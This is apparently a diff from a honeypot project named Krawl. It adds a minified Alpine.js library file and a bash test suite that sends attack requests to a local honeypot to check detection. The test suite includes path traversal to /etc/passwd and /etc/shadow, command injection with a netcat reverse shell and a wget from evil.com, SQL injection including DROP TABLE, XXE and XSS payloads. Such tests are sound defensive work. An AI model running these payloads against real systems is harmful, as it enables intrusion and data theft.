0;content:""}.leaflet-tooltip-bottom{margin-top:6px}.leaflet-tooltip-top{margin-top:-6px}.leaflet-tooltip-bottom:before,.leaflet-tooltip-top:before{left:50%;margin-left:-6px}.leaflet-tooltip-top:before{bottom:0;margin-bottom:-12px;border-top-color:#fff}.leaflet-tooltip-bottom:before{top:0;margin-top:-12px;margin-left:-6px;border-bottom-color:#fff}.leaflet-tooltip-left{margin-left:-6px}.leaflet-tooltip-right{margin-left:6px}.leaflet-tooltip-left:before,.leaflet-tooltip-right:before{top:50%;margin-top:-6px}.leaflet-tooltip-left:before{right:0;margin-right:-12px;border-left-color:#fff}.leaflet-tooltip-right:before{left:0;margin-left:-12px;border-right-color:#fff}@media print{.leaflet-control{-webkit-print-color-adjust:exact;print-color-adjust:exact}} \ No newline at end of file diff --git a/src/templates/static/vendor/js/alpine.min.js b/src/templates/static/vendor/js/alpine.min.js new file mode 100644 index 0000000..a3be81c --- /dev/null +++ b/src/templates/static/vendor/js/alpine.min.js @@ -0,0 +1,5 @@ +(()=>{var nt=!1,it=!1,W=[],ot=-1;function Ut(e){Rn(e)}function Rn(e){W.includes(e)||W.push(e),Mn()}function Wt(e){let t=W.indexOf(e);t!==-1&&t>ot&&W.splice(t,1)}function Mn(){!it&&!nt&&(nt=!0,queueMicrotask(Nn))}function Nn(){nt=!1,it=!0;for(let e=0;ee.effect(t,{scheduler:r=>{st?Ut(r):r()}}),at=e.raw}function ct(e){N=e}function Yt(e){let t=()=>{};return[n=>{let i=N(n);return e._x_effects||(e._x_effects=new Set,e._x_runEffects=()=>{e._x_effects.forEach(o=>o())}),e._x_effects.add(i),t=()=>{i!==void 0&&(e._x_effects.delete(i),$(i))},i},()=>{t()}]}function ve(e,t){let r=!0,n,i=N(()=>{let o=e();JSON.stringify(o),r?n=o:queueMicrotask(()=>{t(o,n),n=o}),r=!1});return()=>$(i)}var Xt=[],Zt=[],Qt=[];function er(e){Qt.push(e)}function te(e,t){typeof t=="function"?(e._x_cleanups||(e._x_cleanups=[]),e._x_cleanups.push(t)):(t=e,Zt.push(t))}function Ae(e){Xt.push(e)}function Oe(e,t,r){e._x_attributeCleanups||(e._x_attributeCleanups={}),e._x_attributeCleanups[t]||(e._x_attributeCleanups[t]=[]),e._x_attributeCleanups[t].push(r)}function lt(e,t){e._x_attributeCleanups&&Object.entries(e._x_attributeCleanups).forEach(([r,n])=>{(t===void 0||t.includes(r))&&(n.forEach(i=>i()),delete e._x_attributeCleanups[r])})}function tr(e){for(e._x_effects?.forEach(Wt);e._x_cleanups?.length;)e._x_cleanups.pop()()}var ut=new MutationObserver(mt),ft=!1;function ue(){ut.observe(document,{subtree:!0,childList:!0,attributes:!0,attributeOldValue:!0}),ft=!0}function dt(){kn(),ut.disconnect(),ft=!1}var le=[];function kn(){let e=ut.takeRecords();le.push(()=>e.length>0&&mt(e));let t=le.length;queueMicrotask(()=>{if(le.length===t)for(;le.length>0;)le.shift()()})}function m(e){if(!ft)return e();dt();let t=e();return ue(),t}var pt=!1,Se=[];function rr(){pt=!0}function nr(){pt=!1,mt(Se),Se=[]}function mt(e){if(pt){Se=Se.concat(e);return}let t=[],r=new Set,n=new Map,i=new Map;for(let o=0;o{s.nodeType===1&&s._x_marker&&r.add(s)}),e[o].addedNodes.forEach(s=>{if(s.nodeType===1){if(r.has(s)){r.delete(s);return}s._x_marker||t.push(s)}})),e[o].type==="attributes")){let s=e[o].target,a=e[o].attributeName,c=e[o].oldValue,l=()=>{n.has(s)||n.set(s,[]),n.get(s).push({name:a,value:s.getAttribute(a)})},u=()=>{i.has(s)||i.set(s,[]),i.get(s).push(a)};s.hasAttribute(a)&&c===null?l():s.hasAttribute(a)?(u(),l()):u()}i.forEach((o,s)=>{lt(s,o)}),n.forEach((o,s)=>{Xt.forEach(a=>a(s,o))});for(let o of r)t.some(s=>s.contains(o))||Zt.forEach(s=>s(o));for(let o of t)o.isConnected&&Qt.forEach(s=>s(o));t=null,r=null,n=null,i=null}function Ce(e){return z(B(e))}function k(e,t,r){return e._x_dataStack=[t,...B(r||e)],()=>{e._x_dataStack=e._x_dataStack.filter(n=>n!==t)}}function B(e){return e._x_dataStack?e._x_dataStack:typeof ShadowRoot=="function"&&e instanceof ShadowRoot?B(e.host):e.parentNode?B(e.parentNode):[]}function z(e){return new Proxy({objects:e},Dn)}var Dn={ownKeys({objects:e}){return Array.from(new Set(e.flatMap(t=>Object.keys(t))))},has({objects:e},t){return t==Symbol.unscopables?!1:e.some(r=>Object.prototype.hasOwnProperty.call(r,t)||Reflect.has(r,t))},get({objects:e},t,r){return t=="toJSON"?Pn:Reflect.get(e.find(n=>Reflect.has(n,t))||{},t,r)},set({objects:e},t,r,n){let i=e.find(s=>Object.prototype.hasOwnProperty.call(s,t))||e[e.length-1],o=Object.getOwnPropertyDescriptor(i,t);return o?.set&&o?.get?o.set.call(n,r)||!0:Reflect.set(i,t,r)}};function Pn(){return Reflect.ownKeys(this).reduce((t,r)=>(t[r]=Reflect.get(this,r),t),{})}function Te(e){let t=n=>typeof n=="object"&&!Array.isArray(n)&&n!==null,r=(n,i="")=>{Object.entries(Object.getOwnPropertyDescriptors(n)).forEach(([o,{value:s,enumerable:a}])=>{if(a===!1||s===void 0||typeof s=="object"&&s!==null&&s.__v_skip)return;let c=i===""?o:`${i}.${o}`;typeof s=="object"&&s!==null&&s._x_interceptor?n[o]=s.initialize(e,c,o):t(s)&&s!==n&&!(s instanceof Element)&&r(s,c)})};return r(e)}function Re(e,t=()=>{}){let r={initialValue:void 0,_x_interceptor:!0,initialize(n,i,o){return e(this.initialValue,()=>In(n,i),s=>ht(n,i,s),i,o)}};return t(r),n=>{if(typeof n=="object"&&n!==null&&n._x_interceptor){let i=r.initialize.bind(r);r.initialize=(o,s,a)=>{let c=n.initialize(o,s,a);return r.initialValue=c,i(o,s,a)}}else r.initialValue=n;return r}}function In(e,t){return t.split(".").reduce((r,n)=>r[n],e)}function ht(e,t,r){if(typeof t=="string"&&(t=t.split(".")),t.length===1)e[t[0]]=r;else{if(t.length===0)throw error;return e[t[0]]||(e[t[0]]={}),ht(e[t[0]],t.slice(1),r)}}var ir={};function y(e,t){ir[e]=t}function fe(e,t){let r=Ln(t);return Object.entries(ir).forEach(([n,i])=>{Object.defineProperty(e,`$${n}`,{get(){return i(t,r)},enumerable:!1})}),e}function Ln(e){let[t,r]=_t(e),n={interceptor:Re,...t};return te(e,r),n}function or(e,t,r,...n){try{return r(...n)}catch(i){re(i,e,t)}}function re(e,t,r=void 0){e=Object.assign(e??{message:"No error message given."},{el:t,expression:r}),console.warn(`Alpine Expression Error: ${e.message} + +${r?'Expression: "'+r+`" + +`:""}`,t),setTimeout(()=>{throw e},0)}var Me=!0;function ke(e){let t=Me;Me=!1;let r=e();return Me=t,r}function R(e,t,r={}){let n;return x(e,t)(i=>n=i,r),n}function x(...e){return sr(...e)}var sr=xt;function ar(e){sr=e}function xt(e,t){let r={};fe(r,e);let n=[r,...B(e)],i=typeof t=="function"?$n(n,t):Fn(n,t,e);return or.bind(null,e,t,i)}function $n(e,t){return(r=()=>{},{scope:n={},params:i=[]}={})=>{let o=t.apply(z([n,...e]),i);Ne(r,o)}}var gt={};function jn(e,t){if(gt[e])return gt[e];let r=Object.getPrototypeOf(async function(){}).constructor,n=/^[\n\s]*if.*\(.*\)/.test(e.trim())||/^(let|const)\s/.test(e.trim())?`(async()=>{ ${e} })()`:e,o=(()=>{try{let s=new r(["__self","scope"],`with (scope) { __self.result = ${n} }; __self.finished = true; return __self.result;`);return Object.defineProperty(s,"name",{value:`[Alpine] ${e}`}),s}catch(s){return re(s,t,e),Promise.resolve()}})();return gt[e]=o,o}function Fn(e,t,r){let n=jn(t,r);return(i=()=>{},{scope:o={},params:s=[]}={})=>{n.result=void 0,n.finished=!1;let a=z([o,...e]);if(typeof n=="function"){let c=n(n,a).catch(l=>re(l,r,t));n.finished?(Ne(i,n.result,a,s,r),n.result=void 0):c.then(l=>{Ne(i,l,a,s,r)}).catch(l=>re(l,r,t)).finally(()=>n.result=void 0)}}}function Ne(e,t,r,n,i){if(Me&&typeof t=="function"){let o=t.apply(r,n);o instanceof Promise?o.then(s=>Ne(e,s,r,n)).catch(s=>re(s,i,t)):e(o)}else typeof t=="object"&&t instanceof Promise?t.then(o=>e(o)):e(t)}var wt="x-";function C(e=""){return wt+e}function cr(e){wt=e}var De={};function d(e,t){return De[e]=t,{before(r){if(!De[r]){console.warn(String.raw`Cannot find directive \`${r}\`. \`${e}\` will use the default order of execution`);return}let n=G.indexOf(r);G.splice(n>=0?n:G.indexOf("DEFAULT"),0,e)}}}function lr(e){return Object.keys(De).includes(e)}function pe(e,t,r){if(t=Array.from(t),e._x_virtualDirectives){let o=Object.entries(e._x_virtualDirectives).map(([a,c])=>({name:a,value:c})),s=Et(o);o=o.map(a=>s.find(c=>c.name===a.name)?{name:`x-bind:${a.name}`,value:`"${a.value}"`}:a),t=t.concat(o)}let n={};return t.map(dr((o,s)=>n[o]=s)).filter(mr).map(zn(n,r)).sort(Kn).map(o=>Bn(e,o))}function Et(e){return Array.from(e).map(dr()).filter(t=>!mr(t))}var yt=!1,de=new Map,ur=Symbol();function fr(e){yt=!0;let t=Symbol();ur=t,de.set(t,[]);let r=()=>{for(;de.get(t).length;)de.get(t).shift()();de.delete(t)},n=()=>{yt=!1,r()};e(r),n()}function _t(e){let t=[],r=a=>t.push(a),[n,i]=Yt(e);return t.push(i),[{Alpine:K,effect:n,cleanup:r,evaluateLater:x.bind(x,e),evaluate:R.bind(R,e)},()=>t.forEach(a=>a())]}function Bn(e,t){let r=()=>{},n=De[t.type]||r,[i,o]=_t(e);Oe(e,t.original,o);let s=()=>{e._x_ignore||e._x_ignoreSelf||(n.inline&&n.inline(e,t,i),n=n.bind(n,e,t,i),yt?de.get(ur).push(n):n())};return s.runCleanups=o,s}var Pe=(e,t)=>({name:r,value:n})=>(r.startsWith(e)&&(r=r.replace(e,t)),{name:r,value:n}),Ie=e=>e;function dr(e=()=>{}){return({name:t,value:r})=>{let{name:n,value:i}=pr.reduce((o,s)=>s(o),{name:t,value:r});return n!==t&&e(n,t),{name:n,value:i}}}var pr=[];function ne(e){pr.push(e)}function mr({name:e}){return hr().test(e)}var hr=()=>new RegExp(`^${wt}([^:^.]+)\\b`);function zn(e,t){return({name:r,value:n})=>{let i=r.match(hr()),o=r.match(/:([a-zA-Z0-9\-_:]+)/),s=r.match(/\.[^.\]]+(?=[^\]]*$)/g)||[],a=t||e[r]||r;return{type:i?i[1]:null,value:o?o[1]:null,modifiers:s.map(c=>c.replace(".","")),expression:n,original:a}}}var bt="DEFAULT",G=["ignore","ref","data","id","anchor","bind","init","for","model","modelable","transition","show","if",bt,"teleport"];function Kn(e,t){let r=G.indexOf(e.type)===-1?bt:e.type,n=G.indexOf(t.type)===-1?bt:t.type;return G.indexOf(r)-G.indexOf(n)}function J(e,t,r={}){e.dispatchEvent(new CustomEvent(t,{detail:r,bubbles:!0,composed:!0,cancelable:!0}))}function D(e,t){if(typeof ShadowRoot=="function"&&e instanceof ShadowRoot){Array.from(e.children).forEach(i=>D(i,t));return}let r=!1;if(t(e,()=>r=!0),r)return;let n=e.firstElementChild;for(;n;)D(n,t,!1),n=n.nextElementSibling}function E(e,...t){console.warn(`Alpine Warning: ${e}`,...t)}var _r=!1;function gr(){_r&&E("Alpine has already been initialized on this page. Calling Alpine.start() more than once can cause problems."),_r=!0,document.body||E("Unable to initialize. Trying to load Alpine before `` is available. Did you forget to add `defer` in Alpine's `" - -echo -e "\n=== Testing Common Probes ===" -curl -s "$TARGET/.env" -curl -s "$TARGET/wp-admin/" - -echo -e "\n=== Testing Shell Injection ===" -curl -s -X POST "$TARGET/ping" -d "host=127.0.0.1; cat /etc/passwd" - -echo -e "\n=== Done ===" diff --git a/tests/test_all_attacks.sh b/tests/test_all_attacks.sh new file mode 100644 index 0000000..a538f53 --- /dev/null +++ b/tests/test_all_attacks.sh @@ -0,0 +1,338 @@ +#!/bin/bash + +# Test script for all attack types in Krawl honeypot +# Tests: Path Traversal, XXE, Command Injection, SQL Injection, XSS + +# Colors for output +RED='\033[0;31m' +GREEN='\033[0;32m' +YELLOW='\033[1;33m' +BLUE='\033[0;34m' +NC='\033[0m' # No Color + +# Server configuration +SERVER_URL="${SERVER_URL:-http://localhost:1234}" +SLEEP_TIME="${SLEEP_TIME:-0.5}" + +echo -e "${BLUE}======================================${NC}" +echo -e "${BLUE} Krawl Honeypot Attack Test Suite${NC}" +echo -e "${BLUE}======================================${NC}" +echo "" +echo -e "${YELLOW}Testing server: ${SERVER_URL}${NC}" +echo "" + +# Function to print test header +test_header() { + echo "" + echo -e "${GREEN}[TEST]${NC} $1" + echo "----------------------------------------" +} + +# Function to print request info +request_info() { + echo -e "${YELLOW}Request:${NC} $1" +} + +# Function to print response +response_info() { + echo -e "${BLUE}Response (first 200 chars):${NC}" + echo "$1" | head -c 200 + echo "" + echo "" +} + +############################################# +# PATH TRAVERSAL ATTACKS +############################################# + +test_header "Path Traversal - /etc/passwd" +request_info "GET /../../../../etc/passwd" +RESPONSE=$(curl -s "${SERVER_URL}/../../../../etc/passwd") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - /etc/shadow" +request_info "GET /../../../etc/shadow" +RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/shadow") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - Windows path" +request_info "GET /..\\..\\..\\windows\\system32\\config\\sam" +RESPONSE=$(curl -s "${SERVER_URL}/..\\..\\..\\windows\\system32\\config\\sam") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - URL encoded" +request_info "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" +RESPONSE=$(curl -s "${SERVER_URL}/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - /proc/self/environ" +request_info "GET /../../../../proc/self/environ" +RESPONSE=$(curl -s "${SERVER_URL}/../../../../proc/self/environ") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - config file" +request_info "GET /../../config.php" +RESPONSE=$(curl -s "${SERVER_URL}/../../config.php") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# COMMAND INJECTION ATTACKS +############################################# + +test_header "Command Injection - cmd parameter with id" +request_info "GET /test?cmd=id" +RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=id") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - exec parameter with whoami" +request_info "GET /api/search?exec=whoami" +RESPONSE=$(curl -s "${SERVER_URL}/api/search?exec=whoami") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - command parameter with ls" +request_info "GET /admin?command=ls -la" +RESPONSE=$(curl -s "${SERVER_URL}/admin?command=ls%20-la") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - pipe with whoami" +request_info "GET /search?q=test|whoami" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=test|whoami") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - semicolon with id" +request_info "GET /page?id=1;id" +RESPONSE=$(curl -s "${SERVER_URL}/page?id=1;id") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - double ampersand with cat" +request_info "GET /view?file=data.txt&&cat /etc/passwd" +RESPONSE=$(curl -s "${SERVER_URL}/view?file=data.txt&&cat%20/etc/passwd") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - command substitution" +request_info "GET /test?\$(whoami)" +RESPONSE=$(curl -s "${SERVER_URL}/test?\$(whoami)") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - backticks" +request_info "GET /test?\`id\`" +RESPONSE=$(curl -s "${SERVER_URL}/test?\`id\`") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - /bin/bash" +request_info "GET /shell?cmd=/bin/bash -c 'id'" +RESPONSE=$(curl -s "${SERVER_URL}/shell?cmd=/bin/bash%20-c%20'id'") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - netcat" +request_info "GET /test?cmd=nc -e /bin/sh 192.168.1.1 4444" +RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=nc%20-e%20/bin/sh%20192.168.1.1%204444") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - wget" +request_info "GET /test?cmd=wget http://evil.com/malware.sh" +RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=wget%20http://evil.com/malware.sh") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - uname -a" +request_info "GET /info?cmd=uname -a" +RESPONSE=$(curl -s "${SERVER_URL}/info?cmd=uname%20-a") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# SQL INJECTION ATTACKS +############################################# + +test_header "SQL Injection - single quote" +request_info "GET /user?id=1'" +RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - OR 1=1" +request_info "GET /login?user=admin' OR '1'='1" +RESPONSE=$(curl -s "${SERVER_URL}/login?user=admin'%20OR%20'1'='1") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - UNION SELECT" +request_info "GET /product?id=1 UNION SELECT username,password FROM users" +RESPONSE=$(curl -s "${SERVER_URL}/product?id=1%20UNION%20SELECT%20username,password%20FROM%20users") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - SQL comment" +request_info "GET /search?q=test'--" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=test'--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - time-based blind" +request_info "GET /user?id=1' AND SLEEP(5)--" +RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'%20AND%20SLEEP(5)--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - information_schema" +request_info "GET /search?q=1' UNION SELECT table_name FROM information_schema.tables--" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=1'%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - stacked queries" +request_info "GET /user?id=1; DROP TABLE users--" +RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;%20DROP%20TABLE%20users--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - POST request" +request_info "POST /login with username=admin' OR '1'='1" +RESPONSE=$(curl -s -X POST "${SERVER_URL}/login" \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "username=admin' OR '1'='1&password=anything") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# XXE INJECTION ATTACKS +############################################# + +test_header "XXE Injection - file:///etc/passwd" +request_info "POST /api/xml with XXE payload" +XXE_PAYLOAD=' + +]> + + &xxe; +' +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/xml" \ + -H "Content-Type: application/xml" \ + -d "$XXE_PAYLOAD") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XXE Injection - external entity" +request_info "POST /api/process with external entity" +XXE_PAYLOAD=' + + +]> +&bar;' +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/process" \ + -H "Content-Type: application/xml" \ + -d "$XXE_PAYLOAD") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XXE Injection - parameter entity" +request_info "POST /api/data with parameter entity" +XXE_PAYLOAD=' + + +%dtd; +]> +&send;' +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/data" \ + -H "Content-Type: application/xml" \ + -d "$XXE_PAYLOAD") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# XSS ATTACKS +############################################# + +test_header "XSS - script tag" +request_info "POST /api/contact with " +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \ + -H "Content-Type: application/json" \ + -d '{"name":"Test","email":"test@test.com","message":""}') +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - img onerror" +request_info "POST /api/contact with " +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \ + -H "Content-Type: application/json" \ + -d '{"name":"","email":"test@test.com","message":"Test"}') +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - javascript protocol" +request_info "GET /search?q=javascript:alert('XSS')" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=javascript:alert('XSS')") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - svg onload" +request_info "POST /api/comment with " +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/comment" \ + -H "Content-Type: application/json" \ + -d '{"comment":""}') +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - iframe" +request_info "POST /api/contact with